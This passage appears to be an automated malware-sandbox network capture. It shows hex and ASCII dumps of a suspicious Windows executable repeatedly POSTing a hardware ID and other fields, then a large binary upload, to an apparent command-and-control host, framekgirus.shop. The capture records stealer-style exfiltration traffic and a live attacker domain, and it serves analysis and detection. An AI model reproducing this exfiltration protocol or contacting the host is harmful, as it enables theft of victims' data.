                                                                                                                2024-12-30 10:59:42 UTC278OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=ONFA21ZDLTMDHK1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 8761
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:42 UTC8761OUTData Raw: 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54 4d 44 48 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54 4d 44 48 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54 4d 44 48 4b 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 4f 4e 46 41 32 31 5a 44 4c 54
                                                                                                                Data Ascii: --ONFA21ZDLTMDHK1Content-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--ONFA21ZDLTMDHK1Content-Disposition: form-data; name="pid"2--ONFA21ZDLTMDHK1Content-Disposition: form-data; name="lid"nbYRKl----ONFA21ZDLT
                                                                                                                2024-12-30 10:59:42 UTC1127INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:42 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=sldh70706pf167q8vuq23d31sg; expires=Fri, 25 Apr 2025 04:46:21 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hDd26an3UvD3ajFrVweCTThi9xp2GVGI%2BHz7DylMe9OQNX%2BNXQiutzFe%2BGv1vQB9O0DV5JFl83phxfi1zpS0kEaE2vK6u4DwHK%2FZpGRfSJgFmI0gPq09TM1DFzN%2FI2AxCR6I"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa1859f0e967293-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1819&rtt_var=696&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2839&recv_bytes=9697&delivery_rate=1557333&cwnd=158&unsent_bytes=0&cid=bc99c9fd107a7594&ts=493&x=0"
                                                                                                                2024-12-30 10:59:42 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-30 10:59:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.449741104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:43 UTC274OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=441RW6H328
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20384
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:43 UTC15331OUTData Raw: 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 34 34 31 52 57 36 48 33 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                Data Ascii: --441RW6H328Content-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--441RW6H328Content-Disposition: form-data; name="pid"3--441RW6H328Content-Disposition: form-data; name="lid"nbYRKl----441RW6H328Content-Dispo
                                                                                                                2024-12-30 10:59:43 UTC5053OUTData Raw: 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78 29 f8 d7 c1
                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO@dR<x)
                                                                                                                2024-12-30 10:59:44 UTC1125INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:44 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=pdr88snifnv7mtv64qt9d0seo7; expires=Fri, 25 Apr 2025 04:46:23 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPyIcMt%2FvVBhbvGv17ta%2FoXBoLFsxiEdTaNoNgw5T8iMiAXbD1USsiS%2BQFbykUYekFvOr61E6rCy52LHFpkIgfOO5JOGrlUTfpw6CoIRS0HPkY2mBEmkDLLIS3uwktsBlGEh"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa185a6d95a1831-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1655&rtt_var=645&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21338&delivery_rate=1663817&cwnd=235&unsent_bytes=0&cid=279257aa012bc27a&ts=638&x=0"
                                                                                                                2024-12-30 10:59:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-30 10:59:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                7192.168.2.449743104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:45 UTC276OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=99SFX13IJKICJ
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1239
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:45 UTC1239OUTData Raw: 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 39 39 53 46 58 31 33 49 4a 4b 49 43 4a 0d 0a 43
                                                                                                                Data Ascii: --99SFX13IJKICJContent-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--99SFX13IJKICJContent-Disposition: form-data; name="pid"1--99SFX13IJKICJContent-Disposition: form-data; name="lid"nbYRKl----99SFX13IJKICJC
                                                                                                                2024-12-30 10:59:56 UTC1130INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Dec 2024 10:59:56 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=g6irn5grhl8gdf0rgqk62iqsu4; expires=Fri, 25 Apr 2025 04:46:35 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                X-Frame-Options: DENY
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSPwd7qQ1K%2BJjfEKYzfnCsnE3f4W2DbnT1AtIl7kjOnewAjKQvwnGpkk6Cj75%2FvlCHAf%2FZD8XiKcsNXEnl9cUI58lmib6y0PzsB3Zco5nfR9drwYXA2%2FyhHNCJUXKR%2FFF63%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8fa185b099f77c8d-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1787&min_rtt=1780&rtt_var=683&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2151&delivery_rate=1585233&cwnd=185&unsent_bytes=0&cid=8fae1bd2e8eece7a&ts=11654&x=0"
                                                                                                                2024-12-30 10:59:56 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-30 10:59:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                8192.168.2.449744104.21.18.194437940C:\FkSpRTrp\jyidkjkfhjawd.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 10:59:57 UTC277OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=XE2IAUBU8RSB
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 584180
                                                                                                                Host: framekgirus.shop
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 35 38 45 36 39 30 41 30 42 42 32 32 44 38 36 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 58 45 32 49 41 55 42 55 38 52 53 42 0d 0a 43 6f 6e 74 65
                                                                                                                Data Ascii: --XE2IAUBU8RSBContent-Disposition: form-data; name="hwid"658E690A0BB22D8620A4C476FD51BCB1--XE2IAUBU8RSBContent-Disposition: form-data; name="pid"1--XE2IAUBU8RSBContent-Disposition: form-data; name="lid"nbYRKl----XE2IAUBU8RSBConte
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: b7 4d 66 b9 39 4d 74 eb 15 35 a9 c4 41 7b 9f d0 c5 2c 55 6c 44 45 fc 71 26 f0 3e 08 95 5d aa 99 29 bd c6 8f 1b 18 dc ca 2b 24 3e 86 bd d4 09 03 25 4a 95 08 fa f3 f4 46 43 6d cc d0 91 b3 93 da e1 7f 7d dc 27 6a 83 b9 dd d2 4f 70 e6 7f 5e 78 70 6a cd 7c 46 a6 ab ea 41 b6 3a 9a 3d ad 6e ca 7e ff 3e 15 a2 ef 30 15 b2 a1 af 9a 77 b0 a9 7a a2 1a 94 24 ed 09 29 bc 3b d3 d2 c5 79 26 bf 02 37 c8 df 03 6d 41 d5 d1 bd 09 a7 39 3b 66 0b 4d c2 dc 0f a5 ec c5 4d 33 86 5c dc 7c 94 bb 56 79 43 78 1b ce e7 af af d7 1c a4 9e 67 a7 cf fb c4 08 03 a0 17 41 b5 46 a5 d0 2c 8b c4 e8 3f c5 bb 57 4f fa 2d 7f 09 cf 01 3d c2 be b7 75 9f 80 9e 6a c0 0e de bd 9e 7c f0 93 eb 6a 4a 59 60 a7 9b 0a df 7d 36 ea 34 db 6c 6e 73 9d 77 92 22 4b a6 c2 5e 4c fe 59 83 f8 ad 13 87 7e 74 10 f5 de
                                                                                                                Data Ascii: Mf9Mt5A{,UlDEq&>])+$>%JFCm}'jOp^xpj|FA:=n~>0wz$);y&7mA9;fMM3\|VyCxgAF,?WO-=uj|jJY`}64lnsw"K^LY~t
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: bc a2 d8 28 b0 27 35 bd 6c 84 82 e7 47 e3 38 40 f1 53 31 d8 9f 37 53 da 7d e3 c9 61 82 4a 40 7a 17 53 6e 36 5b c7 d2 b9 ce da 08 25 ea 65 f1 3c 9a 83 41 b0 9b b2 36 94 f7 42 21 9a 3e b4 05 16 3d 0e 99 5d 6c 90 14 d4 75 3b ff 5e e9 82 df be 48 21 b5 d7 a9 34 c2 77 5a 66 06 9c c0 e7 0b 41 27 2f aa fe be c3 56 12 44 32 09 83 e8 26 bb cb 79 9c 2b 62 d8 cc 56 98 5f ec f5 7a 12 c0 37 69 7d 67 b3 fb ab 80 72 4d 25 56 73 cd ab eb 69 a8 9d cb c6 c0 63 58 99 d3 6d 06 dd 3a 8d 98 df cb e3 34 da 0a 51 f7 61 4e 4a 9e 27 75 30 22 bd 78 63 08 cf 23 be f1 88 ba 42 bc 0f 1d 2a c5 d9 e7 19 c0 f1 7b f3 0f 81 f2 7f 91 81 b1 39 5f 1c b5 f7 45 d7 0f 6f 97 de 94 8e 0a f7 9d ba 06 cc 44 64 96 1b 0b 72 2e e6 ba d8 c3 9c ac 8d b0 0e 8e f6 07 8e 69 0c 2b c1 99 c3 c7 ce 48 a6 90 95
                                                                                                                Data Ascii: ('5lG8@S17S}aJ@zSn6[%e<A6B!>=]lu;^H!4wZfA'/VD2&y+bV_z7i}grM%VsicXm:4QaNJ'u0"xc#B*{9_EoDdr.i+H
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 34 06 2b 29 17 59 7f f4 0c fa 8f a5 0e cd 3c 0f 5f 81 72 90 c1 17 1d 88 5d 89 db d5 47 ee be 6a be 65 6d fc 88 61 d3 11 e4 01 04 21 e7 9e 73 76 05 8a bf 3b ab 96 06 6b 55 0a 38 a7 07 84 c8 be 9c a3 ec 31 14 08 cf 6e a9 95 c8 b8 fc 5f fc fe b8 73 c3 47 fa c2 97 4f de 17 2c 3a 07 b6 d8 cc 0b 9e af b9 3b 10 40 09 f0 da aa dc 83 ad ee be 60 7f 3e aa 5a 54 bb 54 00 1c 4a 20 b2 21 d7 79 69 13 b7 85 52 f9 6d 22 a5 b2 20 8f 45 f4 ab bb 13 15 2f 9c 52 e1 7b 7b 13 78 ce 97 99 10 4d 01 69 cb 30 b2 9f 1b de 4c a1 6f 44 de e1 9c 84 78 13 e0 91 4b 19 00 f9 9d 20 7e 37 f3 e5 f2 e8 79 82 e8 73 86 81 9e ba e4 7d 48 6d 1d 01 34 03 3c a0 10 17 cb 6a 1b 60 35 79 c1 a7 20 42 ee d3 a2 12 9e f4 94 c2 d3 75 f4 9f ea 5f 98 3b 2b 05 01 d4 e3 5f e7 0d 01 ae 62 67 99 c9 67 65 15 92
                                                                                                                Data Ascii: 4+)Y<_r]Gjema!sv;kU81n_sGO,:;@`>ZTTJ !yiRm" E/R{{xMi0LoDxK ~7ys}Hm4<j`5y Bu_;+_bgge
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: f0 5a d3 1a 8f 52 53 8a 8a 64 0f 08 d7 f3 e5 8a e0 14 fd 94 0e 72 73 a3 43 1c a1 57 b2 eb a4 95 cf 4b 6b 34 ac 58 52 73 ae a9 c8 6f 37 89 31 68 a8 ab ea 56 42 7d 67 e4 3d 31 8b bd 22 2e 13 7c a8 d6 4a 12 9c b8 d1 78 69 c7 5b 60 ce 71 6f 34 db 11 fa da 0f 9f ef af 9f d9 1c f9 d1 a7 27 c5 96 d7 68 a4 cd b4 ec d7 1e 8d 88 8d 49 63 f0 84 42 f1 f2 ae 5f ee 57 ae 96 a9 00 9a ab ca e0 f4 12 64 56 1d 6e 97 a3 a2 8a 9f 0f 6d 5f 59 f3 1b 6d db b0 ac 68 59 7b bd e9 16 17 59 b7 ae 76 90 27 51 45 65 a0 71 23 de e3 90 48 9a 21 17 b5 0d d8 9b e6 69 86 fe 1c 1d e5 b6 01 2d 08 fe fb 9e 8a c3 24 d3 0a 4e c8 8f 68 d1 e6 bb 83 ab de e9 24 87 bc 5a ae 0c a7 75 8a 27 f1 30 20 5e 20 b6 38 88 22 b4 85 e6 ac 41 7c 85 06 78 e7 2a 34 5a 60 1d 05 2f 35 4c 9d 7b 24 3e 7c 1e cd ac 69
                                                                                                                Data Ascii: ZRSdrsCWKk4XRso71hVB}g=1".|Jxi[`qo4'hIcB_WdVnm_YmhY{Yv'QEeq#H!i-$Nh$Zu'0 ^ 8"A|x*4Z`/5L{$>|i
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 3a 2d 47 62 53 4c 7a 3a a4 64 0b bb b5 37 65 c4 62 6f e6 0d 7c 59 83 89 cc 04 34 3f 7c 8f 11 b8 e8 2a 1f aa ef dc 5a 63 ec 89 11 39 53 85 c0 79 a9 e4 98 45 f1 d6 90 c7 a9 63 b3 c9 d5 0e 07 bc 26 fa d4 0a d3 0b 44 67 c8 48 f3 49 be ef 45 be 82 7d 31 5e ea 3a d9 bb 94 d5 31 aa 80 17 12 15 65 ae cd a7 16 62 fb fd 33 5d 6c 26 05 0e eb 34 7b fb 6e ed 13 4a 4e d8 9b a7 c3 e5 d3 4b 84 8c 3c 41 f1 a1 91 1d 20 73 e1 1c b3 81 71 e8 b2 47 ac 29 96 35 f5 b1 e0 53 65 17 e4 96 12 26 80 1c 61 47 fc 8a 7f 42 a4 11 b0 8b b9 3c 53 03 d3 40 8d 4a d8 e4 f4 4c 4e 33 0e ec 57 6b b7 87 1f 83 19 c5 ea ff 18 25 ad c1 93 ad 57 78 02 f7 02 16 54 e5 7b 91 48 f3 23 a7 2a 67 aa 87 0f bc d2 dd f5 d5 b9 77 ba 35 ad e4 ce 7f 74 88 ee 4a 31 09 07 8b d1 22 1c 47 9e 9f 2c 0a 0d ae 9d 22 fc
                                                                                                                Data Ascii: :-GbSLz:d7ebo|Y4?|*Zc9SyEc&DgHIE}1^:1eb3]l&4{nJNK<A sqG)5Se&aGB<S@JLN3Wk%WxT{H#*gw5tJ1"G,"
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: be 72 b7 f4 5b ed 3f af ee 94 ed 2b 5d 9a d4 dd 4d e0 f6 b6 fe 5d c5 fd 33 bc 87 b0 b1 94 d6 8a 5d 7c a5 0c 7a d2 04 06 29 30 2c 22 60 52 b5 79 5d 14 a4 31 c0 62 dd f8 ef 43 20 1b 05 33 b5 33 b5 70 16 80 90 0d a1 10 08 71 b0 2e 0e e5 bc 1e 50 fb 75 1a c9 0b a5 e0 e4 96 d9 07 7b 0c 10 bc 70 51 fc f0 7e 42 d6 e6 c5 fe f4 8f 1a df 77 8a 98 a2 c3 61 f8 59 d3 e5 e5 ee ee ca 3f 0b 57 45 53 c3 d8 86 39 66 1f 62 58 de de 1b ee 2f 1e 41 a4 0c 2f fa 21 30 6b ed 2d 0c 44 04 b1 2d 92 db cd 11 79 cb eb 25 8f 9a 6f 5f 16 d5 c4 f3 52 6c ff d1 a5 87 17 3c f1 6d ff c0 ab f2 50 97 1c 2c 0f dd 29 05 41 18 f8 10 06 ff 6e 17 5e 00 f1 67 2a 3d 5b d0 66 ac ca 8f 8f 7e fc ed 78 ba 00 b8 f4 83 1d fb 03 14 b6 10 6b 2a 93 82 70 36 d6 93 9c 5b 33 b9 3c b5 25 93 66 c0 39 22 9f dd 9a
                                                                                                                Data Ascii: r[?+]M]3]|z)0,"`Ry]1bC 33pq.Pu{pQ~BwaY?WES9fbX/A/!0k-D-y%o_Rl<mP,)An^g*=[f~xk*p6[3<%f9"
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 05 f1 9b 93 fc 60 84 6f 95 74 67 e2 e8 46 5f 46 ce 7f ae e5 77 19 c1 c5 ac 9b 77 0d e6 22 e6 95 ee 70 73 04 07 0b be ec 4e fb 61 72 df 6e c3 7b b1 b4 2d 4d 29 a5 35 b4 a6 c2 e5 d2 a5 cd 4d 36 8b 73 3f de 8c a3 cf 38 3a b7 6c 11 38 21 05 f7 5a 48 74 03 6a 8c c4 ff 82 c7 6c 70 39 f3 31 81 65 39 72 24 92 33 5b 3e e1 ea 32 38 53 be dc bd c2 41 2a 2a 86 94 b1 59 28 2d 2c 6d 32 e5 a9 7f c9 82 12 6e 4d 53 20 06 63 c9 47 e2 b3 2c 6d 22 48 12 b2 7e 11 ce 0d 20 f5 2a b6 76 58 54 b8 ff 5e 50 68 ad a4 1c 21 24 16 7d 63 c4 11 64 34 37 38 e7 80 cd d0 08 b4 eb 5a 2d cc fb 92 71 09 8b 8f 7f ff 58 10 1e 16 84 fe a4 d1 dd 83 3f 0b 31 56 fd 67 b6 26 fc 4f 55 f1 05 9f e9 09 68 ba f5 2d 6d e4 bf 2f 13 1b 9a ad 07 86 b8 23 c7 5e 81 c5 b1 11 86 cc c2 4a 95 f3 17 c9 2a e7 1e 0c
                                                                                                                Data Ascii: `otgF_Fww"psNarn{-M)5M6s?8:l8!ZHtjlp91e9r$3[>28SA**Y(-,m2nMS cG,m"H~ *vXT^Ph!$}cd478Z-qX?1Vg&OUh-m/#^J*
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 05 7d ad 61 82 95 dd 33 36 f5 f6 6d eb 8e a7 7e fd a9 ab fd 7b 5b 90 5d fe 02 8f 28 3a f2 66 42 c8 bb 11 94 d7 a5 d1 49 cb 37 c2 e0 24 b4 57 6b da e8 b3 ea 14 a1 80 85 6f 19 94 99 85 5d 98 1a 27 f2 4d d4 2e d4 b7 55 9a 1c 61 d9 9f 7a 0d 78 fd 48 d8 1f c1 cf 31 40 37 17 5a 46 31 38 65 79 68 17 be fc 04 35 8f 8d 81 7c 2a 91 4d 8a ae ba 8b b6 a3 67 1b 01 1c 56 6a 1b 29 b6 3b 65 17 4f b5 55 70 b4 04 6b 80 85 7e ad bf 78 e5 b2 9f 76 74 dd ed 21 32 2c df 00 61 f0 78 21 c5 cb 6f 55 94 ef 35 d8 eb ce ec 5a 7b a1 2a f4 d8 58 e7 7e 54 fa 05 d6 11 a4 ea ac 06 3e 75 dd 36 6f e3 99 1f de a6 9b 1f a7 7a 3e 8f a5 78 f8 bd 2b a0 65 e0 0c 16 c7 47 36 4e f0 5b 7f 0c a3 75 49 98 7c ff 26 d6 ca ee 8c 26 94 f1 f9 ac eb eb f1 08 93 a6 68 e6 a3 e6 5c 38 2a aa 44 b9 d0 ff 93 de
                                                                                                                Data Ascii: }a36m~{[](:fBI7$Wko]'M.UazxH1@7ZF18eyh5|*MgVj);eOUpk~xvt!2,ax!oU5Z{*X~T>u6oz>x+eG6N[uI|&&h\8*D
                                                                                                                2024-12-30 10:59:57 UTC15331OUTData Raw: 59 56 ca 60 66 eb 8c a1 8d ea 29 32 32 cd a1 8d 8a 1a e5 b9 66 c2 9c 56 37 ed fc b3 df fa 92 50 6d 12 c5 69 32 82 52 86 79 25 e2 90 77 99 5c 1b 26 0b 6d 91 f9 54 29 04 44 ec 8a 02 09 47 59 9c 75 ff 31 22 bb 2f a6 3d b4 14 d7 5c 17 90 ff 8a 81 ce d9 a5 58 fe ef 38 29 fb a3 d2 da 37 39 da b7 e5 d3 03 6c 11 e5 08 06 79 fe d7 45 5c 61 b2 15 b3 c6 bb 1f a5 ba a7 3f a4 48 ba 4f 77 6a 99 e5 50 97 15 69 5f fb 4e a5 9c c0 fa 91 99 52 5a 74 9e d8 f4 ad bc 5b 39 ac d0 4f 5b b2 ff 9d 30 73 62 7e 3b 20 39 c5 86 e2 be 5a 9c 0a 1f f8 d7 cb 60 cf f2 87 ba d9 17 b3 91 ef a5 1b bd c2 5f 2e 56 eb cd b8 2b cf 5a fe 83 3e fb 0f da 35 42 6a b6 5a b4 63 ed 1b ab 6f a6 34 ed 63 5f c0 13 e9 c2 bc e9 98 63 b7 4e ba 04 ed 75 3b af 68 25 d0 01 6e da 65 68 a8 1f 3d 17 b4 7d d0 6c b9
                                                                                                                Data Ascii: YV`f)22fV7Pmi2Ry%w\&mT)DGYu1"/=\X8)79lyE\a?HOwjPi_NRZt[9O[0sb~; 9Z`_.V+Z>5BjZco4c_cNu;h%neh=}l
